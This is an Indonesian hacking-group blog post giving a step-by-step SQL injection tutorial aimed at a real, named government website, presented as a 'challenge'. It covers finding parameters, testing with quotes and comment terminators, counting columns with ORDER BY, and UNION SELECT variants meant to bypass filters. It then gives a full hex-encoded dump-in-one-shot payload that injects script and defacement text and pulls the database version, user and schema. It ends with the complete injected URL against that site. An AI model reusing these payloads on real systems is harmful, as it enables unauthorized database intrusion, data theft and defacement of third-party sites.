input license here
Powered by Blogger
Theme images by Igniel

Report Abuse

Search This Blog

Author
Your Name

Featured Post

Download Aplikasi DroidSQLI Mods v1.0

Download Aplikasi DroidSQLI Mods v1.0

Assalamualaikum,halo pengunjung selamat datang di blog Bomber Cyber Army, pada artikel kali ini saya akan memberikan Download Aplikasi DroidSQLi Mods v1.0. Droid SQLI DroidSQLi adalah aplikasi yang sangat mengagumkan dan sempurna untuk meretas dan m…
Home  ›  Uncategorized

SQL IN PARAMETER HTML

- Post a Comment


*SQL INJECTION (CHALLENGE) IN PARAMETER HTML*
*ASSALAMUALAIKUM BALIK LAGI DENGAN GUA KICK_OUT,KALI INI SAYA AKAN MEMBAGIKAN TUTORIAL CHALLNGE BERBASIS PARAMETER IN HTML*

*UNTUK CHALLNYA :*
*https://lampung.kemenag.go.id/*

*UNTUK MENCARI PARAMETER ID NYA KALIAN KE ANON HACKBAR,KALAU TIDAK ADA ANON HACKBAR KALIAN BISA DOWNLOAD DI GOOGLE DAH ADA BANYAK VERSI :)*


*TEMPEL TARGET WEBSITE KE ANON HACKBAR*


*GESER KETIGA DARI ATAS AMPE MENTOK KE UJUNG,DAN PENCET EXTRACT LINKS*

*PILIH PAGE LINKS*

*PILIH SALAH SATU WEBSITE BERIKUT*

*JIKA SUDAH TEMPELKAN DI GOOGLE ATAU MAU LANGSUNG INJECT DI ANON JUGA BISA ITU SELERA MASING-MASING :)*


*CARA MENGECEK VULN ATAU TIDAK KITA TAMBAHIN TANDA KUTIP ATAS UNTUK MENGECEK WEBSITE ITU RENTAN DALAM SQL INJECTION ATAU TIDAK :)*


*JIKA VULN AKAN ADA PERUBAHAN PADA WEBSITE TERSEBUT ENTAH ITU DARI GAMBAR ATAU FONT PADA WEBSITE TERSEBUT*

*TAMBAHKAN BELANCE DI BELAKANG PARAMETER/BELAKANG KUTIP TERSEBUT :)*

*DAN WEBSITENYA KEMBALI NORMAL*

*BELANCE ADA BEBERAPA MACAM CONTOHNYA :*
*1. --+-*
*2. -- -*
*3. --+*
*4. +--+*
*5. %23*
*6. ;%00*
*( DAN MASIH BANYAK LAGI )*

*JIKA KALAU UDAH KALIAN TINGGAL ORDER BY SAMPAI ERROR KEMBALI CONTOHNYA :*
*ORDER BY 1--+-*
*ORDER BY 2--+-*
*ORDER BY 3--+-*
*DAN ADA JUGA ORDER BY BYPASS CONTOHNYA :*
*ORDER+BY+1+ASC--+-*

*DISINI WEBSITENYA ERROR DIANGKAH 17 BERARTI ANGKANYA CUMAN ADA 16 DOANG :)*

*CARA MWNCARI ANGKAH TOGELNYA DENGAN CARA :*
*UNION SELECT 1--+-*
*UNION SELECT 2--+-*
*SAMPAI ANGKAH YANG KALIAN DAPAT DARI HASIL ORDER BY TADI*
*DAN ADA JUGA UNION SELECT BYPASS CONTOH :*
1.+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3 ( SAMPAI ERROR ) --+-
2.+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+
*DAN MASIH BANYAK LAGI :)*

*OKE LANJUT MENCARI ANGKAH TOGELNYA DENGAN CARA : Parameter' Union Select 1,2,3,4,5,6,6,7,8,9,10,11,12,13,14,15,16--+-.html
*JIKA WEBSITE NYA BLUM MENGELUARKAN ANGKAH TOGELNYA MAKA GUNAKAN ( - ) ( . ) SEBELUM PARAMETER ID, Dan ada juga Yang memakai ( %25 0 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html )*

*DAN BOOM ANGKAH TOGELNYA KLUAR :)*

*TINGGAL KITA INJECT DENGAN CARA MEMASUKAN DIOS KEPADA ANGKAH TOGEL TERSEBUT*
*DENGAN CARA Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html*

*DAN BOOM KE SOLPED :)*


DIOS YANG SAYA GUNAKAN : 

/*!50000cOncat/**KICK_OUT**/*/(0x3c7363726970743e616c6572742822496e6a6563746564204279204b31434b5f30555422293b3c2f7363726970743e3c63656e7465723e3c62723e494e4a4543544544204259204b31434b5f3055542f62723e3c63656e7465723e3c666f6e7420666163653d226d6f6e6f73706163652220636f6c6f723d2270696e6b222073697a653d2231223e4b31434b5f305554202d20515545454e5f4e494748543c2f666f6e743e3c68313e494e4a4543544544204259204b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e4b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e5f5f5f5f5f5f5f5f5f5f3c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e515545454e5f4e494748543c2f68313e3c2f63656e7465723e,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f3353627a357a322f4b49434b4f55542e6a7067222077696474683d2233353022206865696768743d22333530223e3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3c696e733e3c6c6567656e64207374796c653d22636f6c6f723a7265643b223e494e4a4543544544204259204b49434b5f4f55543c2f6c6567656e643e3c2f696e733e3c6d61726b3e3c666f6e7420636f6c6f723d7265643e53554c53454c424c41434b4841543c2f666f6e743c2f6d61726b3e203c2f666f6e743e3c2f63656e7465723e3c2f623e3c62723e,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x))


*DAN HASILNYA :* 

https://lampung.kemenag.go.id/static--43310'%20UNION%20SELECT%201,/*!50000cOncat/**KICK_OUT**/*/(0x3c7363726970743e616c6572742822496e6a6563746564204279204b31434b5f30555422293b3c2f7363726970743e3c63656e7465723e3c62723e494e4a4543544544204259204b31434b5f3055542f62723e3c63656e7465723e3c666f6e7420666163653d226d6f6e6f73706163652220636f6c6f723d2270696e6b222073697a653d2231223e4b31434b5f305554202d20515545454e5f4e494748543c2f666f6e743e3c68313e494e4a4543544544204259204b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e4b31434b5f3055543c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e5f5f5f5f5f5f5f5f5f5f3c2f68313e3c2f63656e7465723e3c63656e7465723e3c68313e515545454e5f4e494748543c2f68313e3c2f63656e7465723e,0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f692e6962622e636f2f3353627a357a322f4b49434b4f55542e6a7067222077696474683d2233353022206865696768743d22333530223e3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3c696e733e3c6c6567656e64207374796c653d22636f6c6f723a7265643b223e494e4a4543544544204259204b49434b5f4f55543c2f6c6567656e643e3c2f696e733e3c6d61726b3e3c666f6e7420636f6c6f723d7265643e53554c53454c424c41434b4841543c2f666f6e743c2f6d61726b3e203c2f666f6e743e3c2f63656e7465723e3c2f623e3c62723e,0x3c62723e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**KICK_OUT**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**KICK_OUT**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**KICK_OUT**/*/(),0x3c62723e,(selEct(@x)/*!50000fRom/**KICK_OUT**/*/(/*!50000sElect/**KICK_OUT**/*/(@x:=0x00),(sElect(0)/*!From/**KICK_OUT**/*/(/*!50000inforMation_schEma.coLuMns/**KICK_OUT**/*/)/*!50000Where/**KICK_OUT**/*/(taBle_schema=/*!50000DatAbase/**KICK_OUT*/*/())and(0x00)in(@x:=/*!50000coNcat/**KICK_OUT**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**KICK_OUT**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**KICK_OUT**/*/))))x)),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-.html

Newer Older
BomberCyberArmy
Gw F4K3_5M1LE

Related Posts

Post a Comment